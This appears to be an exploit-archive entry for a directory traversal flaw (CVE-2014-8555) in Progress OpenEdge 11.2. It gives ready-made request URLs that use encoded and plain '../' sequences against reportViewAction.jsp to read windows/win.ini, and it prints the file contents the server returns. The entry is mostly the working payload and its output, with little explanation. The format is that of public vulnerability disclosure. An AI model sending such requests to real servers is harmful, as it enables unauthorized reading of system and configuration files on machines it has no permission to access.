Progress OpenEdge 11.2 - Directory Traversal Vulnerability

2014-11-10T00:00:00
ID 1337DAY-ID-22848
Type zdt
Reporter Mauricio Correa
Modified 2014-11-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555

The malicious user sends a malformed request that generates the file access
up directories as follows:

http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

or else

http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini
 
And the application answers

; for 16-bit app support
 
[fonts]
 
[extensions]
 
[mci extensions]
 
[files]
 
[Mail]
 
MAPI=1
 
CMCDLLNAME32=mapi32.dll
 
CMC=1
 
MAPIX=1
 
MAPIXVER=1.0.0.1
 
OLEMessaging=1

More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256

Thanks

#  0day.today [2018-03-20]  #